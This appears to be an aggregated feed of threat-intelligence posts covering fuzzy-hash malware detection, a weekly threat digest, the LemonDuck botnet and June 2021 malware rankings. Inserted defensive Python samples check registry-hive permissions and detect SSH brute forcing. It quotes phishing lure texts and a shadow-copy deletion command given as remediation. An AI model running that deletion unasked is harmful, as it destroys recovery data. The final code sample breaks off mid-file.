We got fairly good results with most techniques. However, to deploy this model in Microsoft 365 Defender we also had to weigh factors like inference time and the number of parameters in the network. Inference time ruled out the sequential models: even though they were the best in terms of precision and recall, they are the slowest to run inference on. The Transformers we experimented with also yielded excellent results but had several million parameters, which would be too costly to deploy at scale.

That left the convolutional approach and the multilayer perceptron. Of the two, the perceptron yielded slightly better results, because the spatial adjacency that convolutional filters impose does not properly capture the relationships among the embeddings.

Once we had landed on a viable architecture, we used modern tools available to us that Microsoft continues to extend. We used Azure Machine Learning GPU capabilities to train these models at scale, then exported them to Open Neural Network Exchange (ONNX), which gave us the extra performance we needed to operationalize this at scale on Microsoft Defender Cloud.

Deep learning fuzzy hashes: Looking for the similarities that matter

A question that arises from an approach like this is: why use deep learning at all?

Adding machine learning allows us to learn which similarities on fuzzy hashes matter and which ones don’t. Additionally, adding deep learning and training on vast amounts of data increases the accuracy of malware classification and allows us to understand the minor nuances that differentiate legitimate software from its malware or Trojanized versions.

A deep learning approach also has inherent benefits, one of which is pre-training large models on massive amounts of data. Such a model can then be reused for different classification, clustering, and other scenarios through transfer learning. This is similar to how modern NLP approaches language tasks, like how OpenAI’s GPT-3 solves question answering.

Another inherent benefit of deep learning is that one does not have to retrain the model from scratch. Since new data is constantly flowing into the Microsoft Defender Cloud, we can fine-tune the model on this incoming data to adapt and quickly respond to an ever-changing threat landscape.

Conclusion: Continuing to harness the immense potential of deep learning in security

Deep learning continues to provide opportunities to improve threat detection significantly. The deep learning approach discussed in this blog entry is just one of the ways we at Microsoft apply deep learning in our protection technologies to detect and block evasive threats. Data scientists, threat experts, and product teams work together to build AI-driven solutions and investigation experiences.

By treating fuzzy hashes as “words” and not mere codes, we proved that natural language techniques in deep learning are viable methods to solve the current challenges in the threat landscape. This change in perspective presents different possibilities in cybersecurity innovation that we are looking forward to exploring further.

Numerous AI-driven technologies like this allow Microsoft 365 Defender to automatically analyze massive amounts of data and quickly identify malware and other threats. As the GoldMax case study showed, the ability to identify new and unknown malware is a critical aspect of the coordinated defense that Microsoft 365 Defender delivers to protect customers against the most sophisticated threats.

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft 365 Defender.


Edir Garcia Lazo

Microsoft 365 Defender Research Team

The post Combing through the fuzz: Using fuzzy hashing and deep learning to counter malware detection evasion techniques appeared first on Microsoft Security Blog.

The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cryptojacking, Downloaders, Malspam, RATs, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.

Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Windows “PetitPotam” Network Attack – How to Protect Against It

(published: July 21, 2021)

Microsoft has released mitigations for a new Windows attack called PetitPotam. Security researcher Gilles Lionel published a proof-of-concept that abuses MS-EFSRPC (the Encrypting File System Remote Protocol) to coerce a Windows host, including a domain controller, into authenticating to an attacker-controlled server with NTLM. The attack chain Microsoft describes requires NTLM authentication to be enabled on the domain, Active Directory Certificate Services (AD CS) to be in use, and Certificate Authority Web Enrollment or Certificate Enrollment Web Service to be enabled. Exploitation results in an NTLM relay attack, a form of man-in-the-middle attack.
Analyst Comment: Microsoft has provided mitigation steps for this attack, including disabling NTLM on a potentially affected domain, among other measures.
Tags: Vulnerability, Microsoft, PetitPotam, Man-in-the-middle

APT31 Modus Operandi Attack Campaign Targeting France

(published: July 21, 2021)

The French cybersecurity agency ANSSI issued an alert through CERT-FR discussing attacks targeting multiple French entities. The China-sponsored advanced persistent threat (APT) group APT31 (Judgment Panda, Zirconium) has been attributed to this ongoing activity. The group was observed using “a network of compromised home routers as operational relay boxes in order to perform stealth reconnaissance as well as attacks.”
Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place.
MITRE ATT&CK: [MITRE ATT&CK] Resource Hijacking – T1496
Tags: APT, APT31, Judgment Panda, Zirconium, Home routers

StrongPity APT Group Deploys Android Malware for the First Time

(published: July 21, 2021)

Trend Micro researchers analyzed a malicious APK sample shared on Twitter by MalwareHunterTeam. The sample was described as a trojanized version of an Android app offered on the legitimate Syrian E-Gov website, potentially delivered via a watering-hole attack. Researchers pivoted from this information to analyze the backdoor functionality of the trojanized app (which is no longer being distributed on the official Syrian E-Gov website). Additional samples were identified contacting URLs identical to, or following the same pattern as, those in previous reporting on the advanced persistent threat (APT) group StrongPity in 2019 and 2020. The group is believed to be actively developing new backdoors for Android, as evidenced by new modules for stealing different types of messages from infected devices.
Analyst Comment: Keep mobile devices fully patched with the latest security updates and run trusted antivirus software. Obtain software from the Google Play Store or Apple App Store and avoid downloading applications, even if they appear legitimate, from third-party stores. Before installing, review the permissions the application requests and the comments of others who have installed it.
Tags: APT, StrongPity, Android

Top Prevalent Malware with a Thousand Campaigns Migrates to macOS

(published: July 21, 2021)

The notorious Formbook information-stealing malware has once again undergone changes, according to Check Point researchers. The malware started as a simple keylogger over five years ago, became known as XLoader in February 2020, and can now steal data from machines running macOS or Windows. XLoader is offered for purchase on multiple forums at prices ranging from $69 (USD) to $139 depending on the site and the additional malware features. Formbook/XLoader is capable of keylogging, stealing credentials from web browsers, taking screenshots, and downloading and executing additional files on instruction from a command and control server.
Analyst Comment: Information stealing is a common and prevalent threat facing individuals and organizations around the world. Education on frequently-used delivery methods such as malspam and phishing emails can help prevent infection. In addition, maintain efficient log management policies to identify potentially abnormal network activity.
MITRE ATT&CK: [MITRE ATT&CK] Third-party Software – T1072
Tags: Info stealer, Formbook, XLoader, Windows, macOS

Windows Elevation of Privilege Vulnerability

(published: July 20, 2021)

A new Windows 10 vulnerability, assigned CVE-2021-36934 and referred to as HiveNightmare/SeriousSAM, affects Windows 10 version 1809 and later. The issue arises from non-admin users being granted read access to files in the %windir%\system32\config directory, including the SAM, SECURITY, and SYSTEM registry hives, which can allow local privilege escalation. The hive files are locked while Windows is running, but if a Volume Shadow Copy Service (VSS) shadow copy of the system volume is available (VSS is the Windows feature that creates backups or snapshots of files or volumes), a non-admin user can read the copies of these files from it and abuse them for malicious activity.
Analyst Comment: Microsoft has issued workarounds for CVE-2021-36934: first restrict access to the directory with the command “icacls %windir%\system32\config\*.* /inheritance:e”, then delete any VSS shadow copies and System Restore points that existed before access was restricted, since they still contain readable copies of the hives. Deleting shadow copies could negatively impact restore operations for Microsoft and third-party services. Microsoft stated, “You must restrict access and delete shadow copies to prevent exploitation of this vulnerability.”
Tags: Vulnerability, Windows 10, CVE-2021-36934, Privilege escalation
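Added example (not part of the Anomali digest or Microsoft's guidance): a triage helper that parses `icacls` output for the hive files and reports whether a low-privileged principal can read them, so the check can be run on one host or over transcripts collected from a fleet. The transcripts embedded below are constructed to match the documented vulnerable state (BUILTIN\Users with RX) and the state after the `/inheritance:e` fix; the hive paths are the standard ones and the set of "read-capable" icacls codes is an assumption chosen to err on the side of reporting.

```python
"""Triage helper for CVE-2021-36934 (HiveNightmare): parses `icacls` output for
the registry hive files and reports which of them a low-privileged principal
can read. Added example, not Microsoft's code; the transcripts below are
constructed to match the documented vulnerable and remediated states."""
import os
import re
import subprocess

HIVES = (r"C:\Windows\system32\config\SAM",
         r"C:\Windows\system32\config\SECURITY",
         r"C:\Windows\system32\config\SYSTEM")
READ_RIGHTS = {"F", "M", "RX", "R", "GR", "RD"}      # icacls codes that permit reading content (assumed set)
LOW_PRIV = {r"BUILTIN\Users", "Everyone", r"NT AUTHORITY\Authenticated Users"}
ACE_LINE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(output: str, path: str):
    """Map each principal in an icacls transcript to its set of right codes."""
    aces = {}
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path + " "):          # the first ACE shares its line with the path
            line = line[len(path) + 1:].strip()
        m = ACE_LINE.match(line)
        if not m:                                # blank line or the trailing summary
            continue
        codes = set(re.findall(r"\(([^)]*)\)", m["rights"]))
        aces.setdefault(m["principal"], set()).update(codes)
    return aces


def readable_by_low_priv(output: str, path: str):
    """Low-privileged principals with read access to `path`, sorted."""
    aces = parse_icacls(output, path)
    return sorted(p for p, codes in aces.items() if p in LOW_PRIV and codes & READ_RIGHTS)


def exposed_hives(transcripts):
    """transcripts maps hive path -> icacls output; returns the hives a non-admin can read."""
    return [p for p, out in transcripts.items() if readable_by_low_priv(out, p)]


def collect(paths=HIVES):
    """Run icacls on a Windows host (only meaningful there)."""
    return {p: subprocess.run(["icacls", p], capture_output=True, text=True).stdout for p in paths}


# Constructed transcripts. The vulnerable SAM shows the BUILTIN\Users RX entry
# that makes the hive readable; the SYSTEM transcript shows the state after
# `icacls %windir%\system32\config\*.* /inheritance:e`.
VULNERABLE_SAM = r"""C:\Windows\system32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
FIXED_SYSTEM = r"""C:\Windows\system32\config\SYSTEM NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    transcripts = collect() if os.name == "nt" else {HIVES[0]: VULNERABLE_SAM, HIVES[2]: FIXED_SYSTEM}
    for hive in exposed_hives(transcripts):
        print("readable by non-admin:", hive)
```

A clean ACL is only half of the workaround: shadow copies taken while the ACL was wrong still hold readable copies of the hives, which is why Microsoft's guidance also says to delete them (for example with `vssadmin delete shadows /for=C: /quiet`), with the restore impact noted in the Analyst Comment above.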

New Attacks on Kubernetes via Misconfigured Argo Workflow

(published: July 20, 2021)

A new attack vector has been discovered targeting Kubernetes (K8s) clusters through misconfigured Argo Workflows instances, according to Intezer researchers. Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes, according to its documentation. One misconfigured Argo Workflows cluster was found to be running a kannix/monero cryptocurrency miner.
Analyst Comment: Like any system that stores potentially sensitive information, container platforms need to be configured properly so that threat actors cannot target them. Ensure that environments have security policies in place, such as the principle of least privilege, so that permissions are granted only on a need-to-access basis.
MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts – T1078 | [MITRE ATT&CK] Resource Hijacking – T1496
Tags: Argo Workflows, Kubernetes, Misconfigured, Cryptomining

Debugging MosaicLoader, One Step at a Time

(published: July 20, 2021)

Bitdefender researchers have reported their findings on a new malware family dubbed MosaicLoader. The malware was discovered when researchers noticed “processes that add local exclusions in Windows Defender for specific file names (prun.exe, appsetup.exe, etc.), that all reside in the same folder, called PublicGaming.” The malware is delivered through archives masquerading as cracked software installers. The threat actors purchase search engine advertising to boost their malicious archives’ visibility and potential delivery. MosaicLoader can deliver any other kind of malware and uses a unique obfuscation technique that shuffles code chunks, creating a mosaic-like structure.
Analyst Comment: Cracked software is a well-known and common delivery method for malicious payloads or first-stage infections. Always check to ensure that you are downloading software from the legitimate website for the desired product.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Software Discovery – T1518 | [MITRE ATT&CK] Remote Services – T1021 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071
Tags: Malware loader, MosaicLoader, Cracked software

CVE-2021-3438: 16 Years in Hiding – Millions of Printers Worldwide Vulnerable

(published: July 20, 2021)

A high-severity vulnerability, tracked as CVE-2021-3438, has been identified by SentinelLabs researchers in printer driver software used by HP, Samsung, and Xerox printers. The vulnerability has resided in the driver since 2005. Over the last 16 years the affected driver has shipped with more than 380 different HP and Samsung printer models and at least 12 Xerox models. CVE-2021-3438 is a kernel driver vulnerability; exploitation allows an unprivileged user account to escalate to the SYSTEM account and run code in kernel mode, since the vulnerable driver is locally accessible to anyone. Researchers note that they have not seen this vulnerability actively exploited in the wild.
Analyst Comment: The potential scope of this vulnerability is significant. Users should follow Security Advisories from both HP (HPSBPI03724) and Xerox (XRX21K) and apply the necessary patches as soon as possible. The list of affected HP and Samsung printer models can be found here, and the list of affected Xerox printers models can be found here.
Tags: Vulnerability, CVE-2021-3438, Printer driver software, HP, Samsung, Xerox

Remcos RAT Delivered via Visual Basic

(published: July 19, 2021)

Malwarebytes researchers have discovered a financially-themed malspam campaign that distributed the remote access tool (RAT) Remcos. All of the malspam email subject lines are typical for malspam delivering a commodity tool like Remcos. Some of these subject lines include: Appraisal Report for you Loan Application-1100788392210, FWD: Reminder: Your July Appointment-11002214991. The emails refer recipients to an attached archive that, if downloaded, will enable a Visual Basic script to download and execute a Remcos payload. Researchers found metadata inside the archive inside a .hta file that included “demo” in its code which researchers suggest may indicate that threat actors are testing new code.
Analyst Comment: Financially-themed malspam emails are a common tactic among threat actors, so it is crucial that employees know their financial institutions’ policies regarding electronic communication. If a user is worried by the scare tactics often used in such emails, they should contact their financial institution through a known-legitimate channel rather than replying or following links. Urgent requests to open a document and poor grammar are often indicative of malspam or phishing. Such emails should be avoided and reported to the appropriate personnel.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Command-Line Interface – T1059 | REVOKED – [MITRE ATT&CK] File Permissions Modification – T1222
Tags: Malspam, VB Script, Remcos RAT

Researchers Warn of Linux Cryptojacking Attackers Operating from Romania

(published: July 19, 2021)

A new cryptojacking threat group, which is likely based in Romania and has been active since at least 2020, is actively attacking Linux-based machines with weak SSH passwords, according to Bitdefender researchers. The group uses a previously-unknown SSH brute force attack tool written in Go, dubbed “Diicot brute,” that is reportedly being sold as a software-as-a-service (SaaS). In addition, the unnamed group is also involved in distributed denial-of-service (DDoS), which involves a variant of the DDoS botnet malware Demonbot called “chernobyl.” The group is primarily-motivated by mining Monero cryptocurrency via XMRig through access gained by conducting SSH brute force attacks.
Analyst Comment: A strong password policy is a proactive step toward mitigating password brute force attacks. Cybersecurity frameworks such as NIST offer guidelines and best practices for a variety of subjects. For passwords, it is helpful to require a minimum length of at least eight characters, allow the use of special characters, and reject sequential and repetitive characters.
MITRE ATT&CK: [MITRE ATT&CK] Brute Force – T1110 | [MITRE ATT&CK] Drive-by Compromise – T1189 | [MITRE ATT&CK] Valid Accounts – T1078 | [MITRE ATT&CK] Account Manipulation – T1098 | [MITRE ATT&CK] Create Account – T1136 | [MITRE ATT&CK] External Remote Services – T1133 | [MITRE ATT&CK] Indicator Removal on Host – T1070 | [MITRE ATT&CK] Web Service – T1102 | [MITRE ATT&CK] Resource Hijacking – T1496
Tags: Threat Group, Cryptojacking, Monero mining, DDoS
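The SSH brute-force pattern described above, as an added detection example (not Bitdefender's tooling and not the Diicot brute tool): it walks OpenSSH `auth.log` lines once, raises one alert when a source address reaches a failure threshold inside a sliding window, and a second, higher-priority alert when a successful password login follows a run of failures from the same address, which is what a guessed credential looks like in the log. The log lines are constructed; the thresholds and the year supplied to the syslog timestamps are assumptions to tune per environment.

```python
"""Detection of SSH password brute-forcing, and of the brute-force-then-success
sequence that indicates a guessed credential, from OpenSSH auth.log lines.
Added example, not Bitdefender's tooling; the log lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$")


def parse(line: str, year: int = 2021):
    """(timestamp, outcome, user, ip) for a password-auth line, else None.
    Syslog timestamps carry no year, so one is supplied (assumption)."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["outcome"], m["user"], m["ip"]


def detect(lines, threshold=5, window=timedelta(minutes=10), success_after=3):
    """Stream lines once; return alerts as tuples.

    ('brute_force', ip, count)  first time an IP reaches `threshold` failures
                                inside the sliding `window`
    ('compromise', ip, user)    a successful password login from an IP with at
                                least `success_after` failures still in the window
    Thresholds are assumptions to tune per environment.
    """
    failures = defaultdict(list)      # ip -> timestamps of failures still inside the window
    alerted, alerts = set(), []
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, outcome, user, ip = parsed
        recent = [t for t in failures[ip] if ts - t <= window]   # drop expired failures
        if outcome == "Failed":
            recent.append(ts)
            if len(recent) >= threshold and ip not in alerted:
                alerted.add(ip)
                alerts.append(("brute_force", ip, len(recent)))
        elif len(recent) >= success_after:
            alerts.append(("compromise", ip, user))
        failures[ip] = recent
    return alerts


# Constructed auth.log excerpt: one address guesses five times and gets in;
# a legitimate user mistypes once and then succeeds.
SAMPLE_LOG = """\
Jul 19 03:12:01 web01 sshd[2210]: Failed password for root from 203.0.113.7 port 51012 ssh2
Jul 19 03:12:03 web01 sshd[2212]: Failed password for invalid user admin from 203.0.113.7 port 51020 ssh2
Jul 19 03:12:05 web01 sshd[2214]: Failed password for root from 203.0.113.7 port 51031 ssh2
Jul 19 03:12:07 web01 sshd[2216]: Failed password for invalid user oracle from 203.0.113.7 port 51044 ssh2
Jul 19 03:12:09 web01 sshd[2218]: Failed password for root from 203.0.113.7 port 51050 ssh2
Jul 19 03:12:11 web01 sshd[2220]: Accepted password for root from 203.0.113.7 port 51058 ssh2
Jul 19 03:15:40 web01 sshd[2301]: Failed password for alice from 198.51.100.4 port 40022 ssh2
Jul 19 03:15:52 web01 sshd[2303]: Accepted password for alice from 198.51.100.4 port 40030 ssh2
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Where key-based access is feasible, `PasswordAuthentication no` in `sshd_config` removes this attack surface entirely; the detection matters for the hosts where password logins cannot be switched off, and the compromise alert is the one to page on.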

Interesting research: “EvilModel: Hiding Malware Inside of Neural Network Models”.

Abstract: Delivering malware covertly and detection-evadingly is critical to advanced malware campaigns. In this paper, we present a method that delivers malware covertly and detection-evadingly through neural network models. Neural network models are poorly explainable and have a good generalization ability. By embedding malware into the neurons, malware can be delivered covertly with minor or even no impact on the performance of neural networks. Meanwhile, since the structure of the neural network models remains unchanged, they can pass the security scan of antivirus engines. Experiments show that 36.9MB of malware can be embedded into a 178MB-AlexNet model within 1% accuracy loss, and no suspicions are raised by antivirus engines in VirusTotal, which verifies the feasibility of this method. With the widespread application of artificial intelligence, utilizing neural networks becomes a forwarding trend of malware. We hope this work could provide a referenceable scenario for the defense on neural network-assisted attacks.

News article.


FortiGuard Labs has observed a new wiper malware targeting the 2021 Tokyo Olympic games. Read our blog for initial updates on this threat.

In June 2021, the MS-ISAC observed BitCoin Miner, Mirai, and Ursnif’s return to the Top 10. The Top 10 Malware variants comprise 62% of the total malware activity in June 2021, decreasing 13% from May 2021. Shlayer is likely to continue its prevalence in the Top 10 Malware for the coming quarter. However, a recent patch from Apple addresses a zero-day vulnerability Shlayer used. This is likely reducing its effect, as we saw a 57% decrease in infections from the previous month.

Chart: Top 10 malware over the past six months (June 2021)

Chart: Top 10 malware, June 2021 (pie chart)

In June 2021, malvertisement accounted for the greatest number of alerts. Malvertisement continues as the top initial infection vector due to Shlayer activity. Activity levels for dropped increased, while activity for malspam, malvertisement, and multiple decreased.

Shlayer activity dropped 57% from the previous month likely due to the recent patch from Apple affecting its campaign. The patch fixes a zero-day vulnerability exploited by Shlayer to bypass Apple’s Gatekeeper, File Quarantine, and Notarization security checks. The patch will likely affect Shlayer’s ability to download second-stage malicious payloads, as well as its ability to download its own payload. However, it is unlikely to stop its initial infection vector as a whole. It is likely that malvertisement will remain the primary infection vector as the Shlayer campaign pans out.


Chart: Top 10 malware, June 2021, initial infection vectors


Dropped – Malware delivered by other malware already on the system, an exploit kit, infected third-party software, or manually by a cyber threat actor. Mirai and Gh0st are the only malware dropped.

Multiple – Malware that currently favors at least two vectors. Currently, BitCoin Miner, CoinMiner, CryptoWall, and ZeuS are the malware utilizing multiple vectors. ZeuS is dropped by other malware, but it is also delivered via malvertisement.

Malspam – Unsolicited emails, which either direct users to malicious web sites or trick users into downloading or opening malware. The Top 10 Malware using this technique are NanoCore, Quasar, and Ursnif.

Malvertisement – Malware introduced through malicious advertisements. Currently, Shlayer is the only Top 10 Malware using this technique.

Top 10 Malware and IOCs

Below are the Top 10 Malware ranked in order of prevalence. The respective indicators of compromise (IOCs) are provided to aid in detecting and preventing infections from these Top 10 Malware variants. Note: The associated URIs are aligned with malware’s respective domain(s) or IP(s) and increase the likelihood of maliciousness when found together. The URIs alone are not inherently malicious.

1. Shlayer

Shlayer is a downloader and dropper for macOS malware. It is primarily distributed through malicious websites, hijacked domains, and malvertising posing as a fake Adobe Flash updater.
All Shlayer domains follow the same pattern <>. Below are several examples of domains Shlayer uses.



2. CoinMiner

CoinMiner is a cryptocurrency miner that uses Windows Management Instrumentation (WMI) and EternalBlue to spread across a network. CoinMiner uses the WMI Standard Event Consumer scripting to execute scripts for persistence. CoinMiner spreads through malspam or is dropped by other malware.

3. Mirai

Mirai is a malware botnet known to compromise internet of things (IoT) devices in order to conduct large-scale DDoS attacks. Mirai is dropped after an exploit has allowed the attacker to gain access to a machine.

4. NanoCore

NanoCore is a RAT spread via malspam as a malicious Excel XLS spreadsheet. As a RAT, NanoCore can accept commands to download and execute files, visit websites, and add registry keys for persistence.

5. Quasar

Quasar is an open-source remote administration tool on the Windows Platform. It is used as a RAT to create backdoors.

6. ZeuS

ZeuS is a modular banking trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS source code in 2011, many other malware variants have adopted parts of its codebase, which means that events classified as ZeuS may actually be other malware using parts of the ZeuS code.

7. Gh0st

Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device that allows an attacker to fully control the infected device.

8. BitCoin Miner

BitCoin Miner is a cryptocurrency miner that uses the infected computer’s resources to mine bitcoin and forwards the results to a remote server.

9. Ursnif

Ursnif, and its variant Dreambot, are banking trojans known for weaponizing documents. Ursnif recently upgraded its code to use TLS (thread local storage) callbacks, an anti-analysis technique, to evade anti-malware software. Ursnif collects victim information from login pages and web forms.

10. CryptoWall

CryptoWall is ransomware commonly distributed through malspam with malicious ZIP attachments, Java vulnerabilities, and malicious advertisements. Upon successful infection, CryptoWall scans the system for drive letters, network shares, and removable drives. CryptoWall runs on both 32-bit and 64-bit systems.

The post Top 10 Malware June 2021 appeared first on CIS.

[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 will be a deep dive on the attacker behavior and will provide investigation guidance.]

Combating and preventing today’s threats to enterprises requires comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines—even so-called commodity malware—can bring in more dangerous threats. We’ve seen this in banking Trojans serving as entry points for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that’s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck’s threat to enterprises is also in the fact that it’s a cross-platform threat. It’s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others—and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems.

This threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.

In the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.

Figure 1. Global distribution of LemonDuck botnet activity

In 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.

In-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.

LemonDuck and LemonCat infrastructure

The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.

LemonDuck is named after the variable “Lemon_Duck” in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.

LemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.

The first, which we call the “Duck” infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing “Lemon_Duck” explicitly in script.

The second infrastructure, which we call “Cat” infrastructure—for primarily using two domains with the word “cat” in them (sqlnetcat[.]com, netcatkit[.]com)—emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.


Table: sample Duck domains and sample Cat domains (the domain list is not reproduced in this extract)
The Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as “blackball”. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.

The fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, the core functionality of a miner botnet mirrors that of other, non-mining malware, making any botnet infection worthy of prioritization.

Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures

Initial access

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.

LemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have scanned both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, Redis, RDP, or other edge services that might be vulnerable to password spraying or to application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).

Once inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.

Because of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don’t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.

From mid-2020 to March 2021, LemonDuck’s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.


Sample email subjects:

* The Truth of COVID-19
* COVID-19 nCov Special info WHO
* What the fcuk
* good bye
* farewell letter
* broken file
* This is your order?

Sample email body content (misspellings as in the lures):

* Virus actually comes from United States of America
* very important infomation for Covid-19
* see attached document for your action and discretion.
* the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.
* what's wrong with you?are you out of your mind!!!!!
* are you out of your mind!!!!!what 's wrong with you?
* good bye, keep in touch
* can you help me to fix the file,i can't read it
* file is brokened, i can't open it

The attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named “readme”. Occasionally, all three types are present in the same email.
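The check that the preceding paragraphs call for, as an added example rather than code from the Microsoft post: a small scanner that applies the lure pattern (a "readme" attachment that is a .doc, a .js, or a .zip containing a .js, paired with one of the known subjects) to a raw message, and deliberately ignores who the sender is, since the mail comes from a colleague's real mailbox. The message it scans is constructed for the example; treating .vbs like .js is an assumption that goes beyond the page, which only documents .js.

```python
# Added example, not from the Microsoft post: apply the LemonDuck lure pattern
# described above to a raw RFC 822 message. The sample message is constructed
# for this example; only the Python standard library is used. Scanning .vbs
# alongside .js is an assumption (the page documents .js only).
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage

# Subjects observed in the campaign (from the table above), lower-cased.
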